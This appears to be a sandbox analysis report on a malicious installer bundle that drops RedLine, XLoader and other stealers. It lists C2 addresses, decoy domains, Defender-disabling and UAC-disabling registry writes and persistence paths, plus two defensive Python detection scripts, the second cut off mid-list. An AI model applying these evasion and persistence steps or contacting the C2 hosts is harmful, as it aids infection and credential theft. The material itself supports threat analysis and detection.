Resubmissions

Date              Task ID            Score
01-11-2021 20:09  211101-yw5kbaafg5  10
01-11-2021 07:13  211101-h2lrdsdhhj  10
01-11-2021 06:40  211101-hfpk6adhfj  10
31-10-2021 18:27  211031-w3r7fsdafj  10
31-10-2021 14:10  211031-rgstmscghm  10
31-10-2021 08:02  211031-jxchlacefm  10
31-10-2021 06:36  211031-hczxqacddp  10
31-10-2021 06:23  211031-g5wv4affb3  10

Analysis

Max time kernel: 4650s
Max time network: 10811s
Platform: windows11_x64
Resource: win11
Submitted: 01-11-2021 06:40
Static task: static1

Behavioral task  Sample                     Resource
behavioral1      setup_x86_x64_install.exe  win7-ja-20210920
behavioral2      setup_x86_x64_install.exe  win7-en-20210920
behavioral3      setup_x86_x64_install.exe  win11
behavioral4      setup_x86_x64_install.exe  win10-ja-20211014
behavioral5      setup_x86_x64_install.exe  win10-en-20211014
behavioral6      setup_x86_x64_install.exe  win10-de-20210920

This page shows the behavioral3 run (resource win11, matching the Analysis block above); the memory-dump yara hits under Signatures are tagged behavioral3/ accordingly.
General

Target: setup_x86_x64_install.exe
Size: 4.5MB
MD5: 3da25ccfa9c258e3ae26854391531c7b
SHA1: 1ed5613b0ad8ab4c47f07e52199a4edd27be40e6
SHA256: 62be0ca52ea9ebc4c577d597b919f6b90cebdcc2179d7d482a04bf5731eec720
SHA512: defed576df3d8325259884b485a0dc7cd673c47028e77f189255e27dca312a0befdc8dc84106cc3103a3027e67a835fad899f9361076a64831db144354a4618c
Malware Config

Extracted: redline
Botnet: srtupdate33
C2: 135.181.129.119:4805

Extracted: xloader
Version: 2.5
Campaign: s0iw
C2: http://www.kyiejenner.com/s0iw/
Decoy domains (64): XLoader, the continuation of FormBook, embeds a list of 64 decoy domains beside its real C2 and sends look-alike requests to them as well, so the domains below are not reliable block-list entries on their own. The C2 URL above and the FormBook check-in Suricata alerts under Signatures are the actionable network indicators.
ortopediamodelo.com
orimshirts.store
universecatholicweekly.info
yvettechan.com
sersaudavelsempre.online
face-booking.net
europeanretailgroup.com
umofan.com
roemahbajumuslim.online
joyrosecuisine.net
3dmaker.house
megdb.xyz
stereoshopie.info
gv5rm.com
tdc-trust.com
mcglobal.club
choral.works
onlineconsultantgroup.com
friscopaintandbody.com
midwestii.com
weespiel.com
babyshell.be
gwynora.com
talkthered.com
f-punk.com
frankmatlock.com
clique-solicite.net
clientloyaltysystem.com
worldbyduco.com
kampfsport-erfurt.com
adndpanel.xyz
rocknfamily.net
ambr-creative.com
wwwks8829.com
thuexegiarehcmgoviet.com
brentmurrell.art
wolf-yachts.com
tenpobiz.com
binnamall.com
crestamarti.quest
terry-hitchcock.com
ocreverseteam.com
taxwarehouse2.xyz
megawholesalesystem.com
epstein-advisory.com
enewlaunches.com
iphone13.community
pianostands.com
newspaper.clinic
alamdave.com
costalitaestepona2d.com
arbacan.com
horikoshi-online-tutoring.net
missingthered.com
ecmcenterprises.com
giaohangtietkiemhcm.com
universidademackenzie.com
kveupcsmimli.mobi
ibellex.com
ikigaiofficial.store
jerseyboysnorfolk.com
xiamensaikang.com
lmnsky.com
bra866.com
Signatures

Process spawned unexpected child process  12 IoCs
This typically indicates the parent process was compromised via an exploit or macro. Here the parent is WMI Provider Host (C:\Windows\system32\wbem\wmiprvse.exe); pid_target is 4936 in every row, so one WmiPrvSE instance launched all twelve rundll32.exe children. WmiPrvSE only spawns what a WMI client asks it to, so this is the classic footprint of Win32_Process.Create being used as a launcher.
Processes (description: Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process):
pid    pid_target  process
1412   4936        rundll32.exe
7928   4936        rundll32.exe
5288   4936        rundll32.exe
6848   4936        rundll32.exe
7788   4936        rundll32.exe
7148   4936        rundll32.exe
11664  4936        rundll32.exe
11704  4936        rundll32.exe
46116  4936        rundll32.exe
9260   4936        rundll32.exe
5628   4936        rundll32.exe
31800  4936        rundll32.exe
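The check behind this signature is a parent/child baseline, and a practitioner writing it for an EDR feed has to cope with one twist the report itself shows later (the OtherParentProcess signatures): the parent recorded on the child can be supplied explicitly by the creator. The Python below is an added example, not code from the sandbox; the event fields, the baseline lists and the sample events are assumptions modelled on the rows above.

```python
"""Flag child processes whose recorded parent, or actual creator, should never spawn them.

Added example, not part of the sandbox report. Event fields, baseline lists and
SAMPLE_EVENTS are assumptions modelled on the report's rows.
"""
import ntpath
from dataclasses import dataclass
from typing import Dict, List, Set


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str           # image path of the new process
    parent_pid: int      # parent as stored on the process object (what Sysmon/EDR show)
    parent_image: str
    creator_pid: int     # process that actually issued the create call (assumed field)
    creator_image: str


# Assumed baseline: parents that have no business launching script/DLL hosts.
SUSPECT_PARENTS: Set[str] = {
    "wmiprvse.exe", "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe",
}
LAUNCHER_CHILDREN: Set[str] = {
    "rundll32.exe", "cmd.exe", "powershell.exe", "mshta.exe", "regsvr32.exe",
    "wscript.exe", "cscript.exe", "certutil.exe",
}


def basename(path: str) -> str:
    # ntpath handles backslash paths on any host OS.
    return ntpath.basename(path).lower()


def check_event(ev: ProcEvent) -> List[str]:
    """Return human-readable findings for one process-creation event."""
    findings: List[str] = []
    child = basename(ev.image)
    # A creator that differs from the recorded parent means the parent handle was
    # passed explicitly (PROC_THREAD_ATTRIBUTE_PARENT_PROCESS): PPID spoofing, or a
    # legitimate broker such as WER. Judge the creator as well as the parent.
    if ev.creator_pid != ev.parent_pid:
        findings.append(
            f"{child} ({ev.pid}): recorded parent {basename(ev.parent_image)} ({ev.parent_pid}) "
            f"but created by {basename(ev.creator_image)} ({ev.creator_pid}); possible PPID spoofing"
        )
    candidates = [("parent", ev.parent_pid, ev.parent_image)]
    if ev.creator_pid != ev.parent_pid:
        candidates.append(("creator", ev.creator_pid, ev.creator_image))
    for role, cpid, cimage in candidates:
        if basename(cimage) in SUSPECT_PARENTS and child in LAUNCHER_CHILDREN:
            findings.append(
                f"{child} ({ev.pid}): {role} {basename(cimage)} ({cpid}) is not expected to spawn this process"
            )
    return findings


def scan(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Map each flagged PID to its findings; PIDs with none are omitted."""
    out: Dict[int, List[str]] = {}
    for ev in events:
        hits = check_event(ev)
        if hits:
            out.setdefault(ev.pid, []).extend(hits)
    return out


# Constructed events; PIDs and names mirror rows from the report, paths are assumed.
SAMPLE_EVENTS = [
    ProcEvent(1412, r"C:\Windows\System32\rundll32.exe",
              4936, r"C:\Windows\System32\wbem\WmiPrvSE.exe", 4936, r"C:\Windows\System32\wbem\WmiPrvSE.exe"),
    ProcEvent(2001, r"C:\Windows\System32\rundll32.exe",
              3232, r"C:\Windows\explorer.exe", 3232, r"C:\Windows\explorer.exe"),  # benign
    ProcEvent(5528, r"C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe",
              3232, r"C:\Windows\explorer.exe", 6244, r"C:\Windows\System32\svchost.exe"),  # reparented
    ProcEvent(7001, r"C:\Windows\System32\mshta.exe",
              3232, r"C:\Windows\explorer.exe", 4100, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),
]

if __name__ == "__main__":
    for hits in scan(SAMPLE_EVENTS).values():
        print("\n".join(hits))
```

Evaluating the creator as well as the recorded parent is what keeps the rule useful against loaders that reparent themselves under explorer.exe; the trade-off is that WER, which starts WerFault.exe with the crashed process as its parent, will also trip the spoofing branch and needs an allow-list entry in production.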
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload  2 IoCs
resource                                                                      yara_rule
behavioral3/memory/1064-302-0x0000000000400000-0x0000000000420000-memory.dmp  family_redline
behavioral3/memory/1064-299-0x0000000000000000-mapping.dmp                    family_redline
PID 1064 is Sun03f0dc4460bc9.exe (see Executes dropped EXE), the process that hgmCgKLLp6_aBM_p6OXdxhM4.exe targets with SetThreadContext further down; the RedLine payload runs injected there, which is why it is found in a memory dump rather than in a dropped file.

Socelars Payload  2 IoCs
resource                                                          yara_rule
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun03d477f1a31.exe  family_socelars
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun03d477f1a31.exe  family_socelars
Suspicious use of NtCreateProcessExOtherParentProcess  45 IoCs
Rows involving WerFault.exe are mostly crash reporting: the WER service starts WerFault.exe with the crashed process assigned as its parent, which is exactly what this check looks for. The schtasks.exe, svchost.exe, cmd.exe and bifurcation.exe rows are the ones worth examining.
Processes:
pid    target pid  process          target process
3984   6140        WerFault.exe     rundll32.exe
2124   4064        WerFault.exe     Sun03d477f1a31.exe
1072   3324        WerFault.exe     Sun033e271e0ce96c08.exe
6900   3612        WerFault.exe     Sun0324aba28588c0.exe
6552   4600        schtasks.exe     Sun03e4aeb7e43a1c.exe
5164   6020        svchost.exe      4.exe
920    1560        WerFault.exe     VaQQKPf9T577ZPDm1uawzRQO.exe
2340   4708        WerFault.exe     hgmCgKLLp6_aBM_p6OXdxhM4.exe
5320   4872        WerFault.exe     WerFault.exe
1308   5872        WerFault.exe     aAXlLwdC9UKnsWc8aTXy3Ptd.exe
5664   5684        WerFault.exe     EBU0gvgBJleOPWdQsXtPukc0.exe
5304   5124        cmd.exe          cmd.exe
5804   8064        WerFault.exe     rundll32.exe
6216   3956        WerFault.exe     cmd.exe
6136   4040        bifurcation.exe
4216   1900        WerFault.exe     6.exe
4432   7392        WerFault.exe     WerFault.exe
6032   7548        WerFault.exe     2CBMfkvtUogf9hzCi_qA7oap.exe
2352   7636        WerFault.exe     hhdys4K7UWyFNobqt4GlqiEh.exe
7392   6952        WerFault.exe     rundll32.exe
3900   5392        WerFault.exe     rundll32.exe
7796   7068        WerFault.exe     3176.exe
1500   2584        WerFault.exe     1asWT9_23sWIkWvXBfuAHztv.exe
5948   6228        WerFault.exe     6A4B.exe
3324   7744        WerFault.exe     RUc12BIkVlXMFW5crVQpYnzm.exe
4872   4228        WerFault.exe     DB08.exe
1428   5280        WerFault.exe     beadroll.exe
3040   6084        WerFault.exe     6A96.exe
6712   6252        WerFault.exe     7AD5.exe
4872   8176        WerFault.exe     WerFault.exe
8032   3720        WerFault.exe     C866.exe
5528   5624        WerFault.exe     GcleanerEU.exe
1052   3724        WerFault.exe     rundll32.exe
7696   30840       WerFault.exe     GcleanerEU.exe
9024   31180       WerFault.exe     gcleaner.exe
8924   8252        WerFault.exe     rundll32.exe
10128  50108       WerFault.exe     gcleaner.exe
10056  49716       WerFault.exe     GcleanerEU.exe
11340  7800        WerFault.exe     GcleanerEU.exe
31816  11692       WerFault.exe     rundll32.exe
31872  31788       WerFault.exe     rundll32.exe
32200  8984        WerFault.exe     gcleaner.exe
32388  9416        WerFault.exe     gcleaner.exe
16968  15296       WerFault.exe     fontdrvhost.exe
49492  48612       WerFault.exe     GcleanerEU.exe
The svchost.exe in row 6 (PID 5164) is a dropped file, not the Windows service host: PID 5164 svchost.exe appears in the Executes dropped EXE list below.
Suspicious use of NtCreateUserProcessOtherParentProcess  10 IoCs
Processes:
pid    target pid  process         target process
6244   5528        svchost.exe     AdvancedRun.exe
6244   5528        svchost.exe     AdvancedRun.exe
6244   3792        svchost.exe     taskkill.exe
6244   3792        svchost.exe     taskkill.exe
6244   3436        svchost.exe     msedge.exe
6244   3436        svchost.exe     msedge.exe
6244   7632        svchost.exe     AdvancedRun.exe
6244   7632        svchost.exe     AdvancedRun.exe
15060  17420       powershell.exe  TrustedInstaller.exe
15152  17420       powershell.exe  TrustedInstaller.exe
Check the image path of PID 6244 before reading "svchost.exe" as a system process: this run drops its own svchost.exe (C:\Users\Public\Documents\03B82AA2\svchost.exe, registered under RunOnce and excluded from Defender below). The powershell.exe/TrustedInstaller.exe pairing is the pattern used to launch a child under TrustedInstaller's token by naming TrustedInstaller.exe as the parent.
Turns off Windows Defender SpyNet reporting  2 TTPs
The registry writes behind this, by 46puvSQnm9v3JLD7WOWMRWFL.exe, are listed in the Windows Defender settings table below.

suricata: ET MALWARE FormBook CnC Checkin (GET)
XLoader is the continuation of FormBook, so this alert corresponds to the xloader configuration extracted above.

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
No Vidar/Arkei configuration was extracted in this run; the network alert is the only evidence of that family here.

suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity

suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

Checks for common network interception software  1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

Identifies VirtualBox via ACPI registry values (likely anti-VM)  2 TTPs
Xloader Payload  2 IoCs
resource                                                                      yara_rule
behavioral3/memory/3940-476-0x0000000002FA0000-0x0000000002FC9000-memory.dmp  xloader
behavioral3/memory/5312-489-0x0000000000380000-0x00000000003A9000-memory.dmp  xloader
PID 3940 is control.exe and PID 5312 is colorcpl.exe (both in the Loads dropped DLL list below): XLoader is running under two Windows system binary names. The same control.exe (3940) later sets thread context in Explorer.EXE and explorer.exe and writes the Policies\Explorer\Run value, so the injection and persistence steps recorded in this run can be tied to the XLoader payload.

Processes (yara rule aspack_v212_v242, 7 IoCs):
resource                                                        yara_rule
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\libcurl.dll       aspack_v212_v242  (3 hits)
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\libcurlpp.dll     aspack_v212_v242  (2 hits)
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\libstdc++-6.dll   aspack_v212_v242  (2 hits)
These are runtime DLLs normally shipped unpacked; matching the ASPack 2.12-2.42 rule means the bundle repacked them.
Adds policy Run key to start application  2 TTPs  2 IoCs
Processes:
process      description      ioc
control.exe  Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
control.exe  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\NPRPDXW = "C:\\Program Files (x86)\\Mrbnhc\\xfatghhxptwtr.exe"
Explorer processes Policies\Explorer\Run at logon just like the ordinary Run key, but it lives under the policy tree, so autorun hunts that only enumerate Run and RunOnce miss it.

Blocklisted process makes network request  8 IoCs
Processes:
process      pid    flows
mshta.exe    3652   151, 153
MsiExec.exe  31772  935, 939, 951, 953, 962, 989
Downloads MZ/PE file

Drops file in Drivers directory  5 IoCs
Processes:
process          description                   ioc
ShareFolder.exe  File opened for modification  C:\Windows\system32\drivers\etc\hosts  (4 times)
Hamivapasi.exe   File opened for modification  C:\Windows\system32\drivers\etc\hosts
Entries written to the hosts file override DNS on the host and are commonly used by installers of this kind to block security-vendor or update domains; diff the file against a clean copy when triaging an infected machine.

Executes dropped EXE  64 IoCs
Processes:
pid    process
2172   setup_installer.exe
5056   setup_install.exe
4064   Sun03d477f1a31.exe
4088   Sun039750b00c.exe
3324   Sun033e271e0ce96c08.exe
4600   Sun03e4aeb7e43a1c.exe
3612   Sun0324aba28588c0.exe
3304   Sun0397381f1f458e.exe
4708   Sun03f0dc4460bc9.exe
2900   Sun038aa349e3318e.exe
1456   Sun038db98f99bf9a.exe
3652   Sun0328255c4bce6fb.exe
812    Sun03ea09aa5c9686e5.exe
2132   Sun03f5d51697d04.exe
3132   Sun0351a0558292.exe
3504   Sun03f5d51697d04.tmp
2944   Sun0397381f1f458e.exe
5192   Sun03f5d51697d04.exe
5312   colorcpl.exe
5384   wXE1XgqZIR_W9IM.exE
1064   Sun03f0dc4460bc9.exe
5580   1907429.exe
5772   tv3K6hSK60TEWOTPIZxPD0z1.exe
5816   qQbVMM4g0bpXElDCk7u81Gef.exe
5800   LzmwAqmV.exe
5924   6722478.exe
4944   Chrome5.exe
4264   3782043.exe
5396   DownFlSetup110.exe
4716   dyEvj3hC2t7OMuwoWXdKUmK3.exe
3392   nuv3nTIlFEYBrkPp1N3C1htI.exe
4708   hgmCgKLLp6_aBM_p6OXdxhM4.exe
5848   9Zb2WtRSw11ACQNzk2XLqI6n.exe
5920   F37OFtk5v9UdORoY8t4Donzo.exe
5808   46puvSQnm9v3JLD7WOWMRWFL.exe
5724   ZP0MR34BkzoGGsDYhHusS489.exe
5612   024wC3SO_qVtbE4Y9Lz5RQz9.exe
5684   EBU0gvgBJleOPWdQsXtPukc0.exe
1560   VaQQKPf9T577ZPDm1uawzRQO.exe
4872   FvMCEwri6_qByE_3M8DbslRU.exe
5472   Zx0htBgAf3gZhfn9rCPnpedY.exe
5064   mXtIGk3ofwNa4d7r1RCLpLFz.exe
5124   K0TibwmFldhZ549RofY1erc4.exe
5872   aAXlLwdC9UKnsWc8aTXy3Ptd.exe
6040   VM2skHGFpeBDBysR6622fBC8.exe
5164   svchost.exe
5256   S7koKpK33vLWjAxi5chFkuJ9.exe
5248   nxfL7_6XSgUfDUVDEan06Mbe.exe
5020   Hj5Pq1vV39n8G1DTpop2wdl2.exe
1652   postback.exe
852    4844256.exe
1512   cmd.exe
1232   jg1_1faf.exe
496    nXZzPjm8z9HP4_SUYbwTPDKm.exe
1616   B2zEVweKaLRoMVSBnxG2zIKP.exe
3224   cutm3.exe
5864   4990988.exe
3956   Soft1WW01.exe
2916   M35Lp9gfDfkC86gCoe6z36z0.exe
5740   4kw4eKu9gndEHqJKFw6yErfF.exe
3792   taskkill.exe
5528   AdvancedRun.exe
6020   4.exe
6176   4kw4eKu9gndEHqJKFw6yErfF.tmp
PID 4708 appears twice (Sun03f0dc4460bc9.exe, then hgmCgKLLp6_aBM_p6OXdxhM4.exe) because the PID was reused during the 4650s run; match on image name and start time, not PID alone, when correlating with the other tables.
Sets service image path in registry  2 TTPs

Stops running service(s)  3 TTPs

Checks BIOS information in registry  2 TTPs  20 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes: each of the ten processes below queried both \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion and \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (Key value queried):
F37OFtk5v9UdORoY8t4Donzo.exe
S7koKpK33vLWjAxi5chFkuJ9.exe
4844256.exe
3176.exe
VM2skHGFpeBDBysR6622fBC8.exe
3782043.exe
6722478.exe
9Zb2WtRSw11ACQNzk2XLqI6n.exe
1959615.exe
997740.exe
The same set of binaries recurs under NtSetInformationThreadHideFromDebugger and the EnableLUA checks below, consistent with a shared protector or loader stub rather than ten independent implementations.
Drops startup file  3 IoCs
Processes:
process                       description                   ioc
46puvSQnm9v3JLD7WOWMRWFL.exe  File created                  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe
46puvSQnm9v3JLD7WOWMRWFL.exe  File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe
QUKHyXjH3qRKVkqx.exe          File created                  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QUKHyXjH3qRKVkqx.vbs

Loads dropped DLL  64 IoCs
Processes (pid, process, number of loads):
5056   setup_install.exe              6
3504   Sun03f5d51697d04.tmp           1
5312   colorcpl.exe                   1
6140   rundll32.exe                   1
2916   M35Lp9gfDfkC86gCoe6z36z0.exe   12
6176   4kw4eKu9gndEHqJKFw6yErfF.tmp   1
3924   msiexec.exe                    1
5812   Calculator Installation.exe    5
8064   rundll32.exe                   1
8028   Qa0ydjRf2tdAW_WXEvJN1dhr.tmp   1
8052   mSbGRGi7Yiq04OsOdmXbOJGl.tmp   1
2004   s8SU1s3eNIwgJA57Ks5cMfdE.exe   3
3584   LvP2JR61i9foyFZ2pnR1CRLZ.tmp   1
7456   GVCbJgN4fvZ0RwrZvawYRPZB.tmp   1
7312   FVFTOIzhXOwuCYMlRx7WbAzn.exe   3
1604   setup.exe                      5
7296   setup.exe                      2
6472   setup.exe                      3
6768   regsvr32.exe                   1
6952   rundll32.exe                   1
5392   rundll32.exe                   1
6756   msiexec.exe                    2
7776   msiexec.exe                    2
33668  installer.exe                  3
47000  MsiExec.exe                    2
3724   rundll32.exe                   1
8252   rundll32.exe                   1
11140  Calculator.exe                 1
Reads data files stored by FTP clients  2 TTPs
Tries to access configuration files associated with programs like FileZilla.

Reads local data of messenger clients  2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

Reads user/profile data of local email clients  2 TTPs
Email clients store some user data on disk where infostealers will often target it.

Reads user/profile data of web browsers  2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Processes (Windows Defender settings modified by 46puvSQnm9v3JLD7WOWMRWFL.exe; all paths are under \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender):
description      ioc
Key created      Exclusions
Set value (int)  Real-Time Protection\DisableRealtimeMonitoring = "1"
Set value (int)  Spynet\SpyNetReporting = "0"
Set value (int)  Spynet\SubmitSamplesConsent = "0"
Set value (int)  Exclusions\Paths\C:\Users\Public\Documents\03B82AA2\svchost.exe = "0"
Set value (int)  Features\TamperProtection = "0"
Set value (int)  Exclusions\Paths\C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe = "0"
Key created      Exclusions\Paths
Set value (int)  Exclusions\Paths\C:\Users\Admin\Pictures\Adobe Films\46puvSQnm9v3JLD7WOWMRWFL.exe = "0"
Key created      Real-Time Protection
Key created      Spynet
Key created      Features
The writes landed under WOW6432Node because the writer is a 32-bit process; the 64-bit Defender service reads the native view, and Tamper Protection refuses registry changes to these settings on a supported build. Read the rows as intent (disable real-time protection, cloud reporting and sample submission; exclude the three persistence paths) rather than as a confirmed effect on a real host. The excluded paths double as a list of where the payload lives.

Accesses Microsoft Outlook accounts  1 TTPs  1 IoCs
Processes:
process            description  ioc
WindowsUpdate.exe  Key opened   \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
WindowsUpdate.exe here is the dropped C:\Users\Admin\AppData\Local\Win32\WindowsUpdate.exe registered under Run by RuntimeBroker.exe (next table), not Windows Update.

Accesses cryptocurrency files/wallets, possible credential harvesting  2 TTPs

Adds Run key to start application  2 TTPs  18 IoCs
Processes (<user hive> stands for \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000):
process                       description      ioc
46puvSQnm9v3JLD7WOWMRWFL.exe  Set value (str)  <user hive>\Software\Microsoft\Windows\CurrentVersion\RunOnce\8CD8CA21 = "C:\\Users\\Public\\Documents\\03B82AA2\\svchost.exe"
setup.exe (3 times)           Key created      \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
Hamivapasi.exe                Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Internet Explorer\\Gaexiwawisi.exe\""
8CD8CA21.exe                  Set value (str)  <user hive>\Software\Microsoft\Windows\CurrentVersion\RunOnce\8CD8CA21 = "C:\\Users\\Public\\Documents\\03B82AA2\\svchost.exe"
ShareFolder.exe               Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows NT\\ZHuqoshybila.exe\""
RuntimeBroker.exe (5 times)   Set value (str)  <user hive>\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Win32\\WindowsUpdate.exe" (four of the five writes carry a trailing character as recorded: 䈀, 쌀, 耀, 夀)
1462013.exe                   Set value (str)  <user hive>\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"
setup.exe (3 times)           Set value (str)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --iUSIg"
msedge.exe                    Key created      <user hive>\Software\Microsoft\Windows\CurrentVersion\Run
QUKHyXjH3qRKVkqx.exe          Set value (str)  <user hive>\Software\Microsoft\Windows\CurrentVersion\Run\QUKHyXjH3qRKVkqx = "\"C:\\Users\\Admin\\AppData\\Roaming\\QUKHyXjH3qRKVkqx.exe\""
Every value points into a user-writable location (Users\Public, AppData, or an unusual subfolder of Program Files (x86)), and two of the names imitate system binaries (svchost.exe, WindowsUpdate.exe); both traits are cheap to check in an autorun hunt.
Checks installed software on the system  1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.

Processes (UAC policy value \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA):
Key value queried by: 9Zb2WtRSw11ACQNzk2XLqI6n.exe, 4844256.exe, 8CD8CA21.exe, 3782043.exe, S7koKpK33vLWjAxi5chFkuJ9.exe, 997740.exe, 46puvSQnm9v3JLD7WOWMRWFL.exe, 3176.exe, F37OFtk5v9UdORoY8t4Donzo.exe, jg1_1faf.exe, VM2skHGFpeBDBysR6622fBC8.exe, 6722478.exe, 1959615.exe
Set value (int) EnableLUA = "0" by: 46puvSQnm9v3JLD7WOWMRWFL.exe, 8CD8CA21.exe
Reading EnableLUA tells a loader whether UAC prompts stand between it and an elevated token; writing 0 turns UAC off from the next logon. The two processes that write it (the same pair that drops into the Startup folder and edits the Defender settings above) therefore matter more than the thirteen that only read it.
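The Defender settings, EnableLUA, BIOS-version and Run/RunOnce/Policies\Explorer\Run rows above are all one event type (registry set or query) and can be triaged with a single pass. The Python below is an added example, not code from the sandbox: it normalises the kernel-style paths the report records, classifies each event and rates autorun entries by whether the image lives in a user-writable directory or imitates a system binary. The event shape, the severity scheme and SAMPLE_EVENTS are assumptions built from the rows shown on this page.

```python
"""Triage registry events for Defender tampering, UAC changes, autorun
persistence and sandbox fingerprinting.

Added example, not part of the sandbox report. Event shape, severity scheme
and SAMPLE_EVENTS are assumptions modelled on the report's rows.
"""
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class RegEvent:
    process: str
    op: str                     # "SetValue", "QueryValue" or "CreateKey"
    path: str                   # kernel-style path exactly as the sandbox records it
    data: Optional[str] = None  # value data for SetValue, else None


@dataclass(frozen=True)
class Finding:
    process: str
    category: str
    severity: str
    detail: str


# Defender values whose listed data switches a protection off.
DEFENDER_TAMPER = {
    "real-time protection\\disablerealtimemonitoring": "1",
    "spynet\\spynetreporting": "0",
    "spynet\\submitsamplesconsent": "0",
    "features\\tamperprotection": "0",
}
RUN_KEYS = (
    "\\microsoft\\windows\\currentversion\\run",
    "\\microsoft\\windows\\currentversion\\runonce",
    "\\microsoft\\windows\\currentversion\\policies\\explorer\\run",
)
BIOS_VALUES = (
    "\\hardware\\description\\system\\systembiosversion",
    "\\hardware\\description\\system\\videobiosversion",
)
USER_WRITABLE = re.compile(r"\\(appdata|users\\public|temp|programdata)\\", re.I)
LOOKALIKE_NAMES = {"svchost.exe", "windowsupdate.exe", "runtimebroker.exe", "explorer.exe", "csrss.exe"}


def normalize(path: str) -> str:
    """Map the sandbox's kernel paths to HKLM/HKU and drop the WOW6432Node redirection."""
    p = re.sub(r"^\\REGISTRY\\MACHINE", "HKLM", path, flags=re.I)
    p = re.sub(r"^\\REGISTRY\\USER\\S-1-5-21-[\d-]+", "HKU", p, flags=re.I)
    return re.sub(r"\\WOW6432Node", "", p, flags=re.I)


def image_from_data(data: str) -> str:
    """Pull the executable path out of an autorun value, ignoring quotes and arguments."""
    m = re.search(r'([A-Za-z]:\\[^"]*?\.exe)', data, re.I)
    return m.group(1) if m else data.strip('"')


def classify(ev: RegEvent) -> Optional[Finding]:
    p = normalize(ev.path)
    low = p.lower()
    key, _, name = low.rpartition("\\")
    data = ev.data or ""
    if ev.op == "SetValue" and "\\windows defender\\" in low:
        idx = low.find("\\windows defender\\exclusions\\")
        if idx != -1:  # value name is the excluded path itself
            excluded = p[idx + len("\\windows defender\\exclusions\\"):]
            return Finding(ev.process, "defender_exclusion", "high", f"Defender exclusion added: {excluded}")
        for suffix, off in DEFENDER_TAMPER.items():
            if low.endswith("\\windows defender\\" + suffix) and data == off:
                return Finding(ev.process, "defender_tamper", "high", f"{name} = {data}")
    if low.endswith("\\policies\\system\\enablelua"):
        if ev.op == "SetValue" and data == "0":
            return Finding(ev.process, "uac_disabled", "high", "EnableLUA set to 0")
        if ev.op == "QueryValue":
            return Finding(ev.process, "uac_query", "low", "UAC state queried")
    if ev.op == "SetValue" and key.endswith(RUN_KEYS):
        image = image_from_data(data)
        lookalike = image.rsplit("\\", 1)[-1].lower() in LOOKALIKE_NAMES and "\\windows\\" not in image.lower()
        sev = "high" if USER_WRITABLE.search(image) or lookalike else "medium"
        return Finding(ev.process, "persistence", sev, f"{p} -> {image}")
    if ev.op == "QueryValue" and low.endswith(BIOS_VALUES):
        return Finding(ev.process, "vm_fingerprint", "low", f"{name} queried")
    return None


def triage(events: List[RegEvent]) -> List[Finding]:
    return [f for f in (classify(ev) for ev in events) if f is not None]


# Constructed events modelled on the report's rows (one benign explorer.exe write added).
SID = r"\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000"
D = r"\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender"
SAMPLE_EVENTS = [
    RegEvent("46puvSQnm9v3JLD7WOWMRWFL.exe", "SetValue", D + r"\Real-Time Protection\DisableRealtimeMonitoring", "1"),
    RegEvent("46puvSQnm9v3JLD7WOWMRWFL.exe", "SetValue", D + r"\Spynet\SpyNetReporting", "0"),
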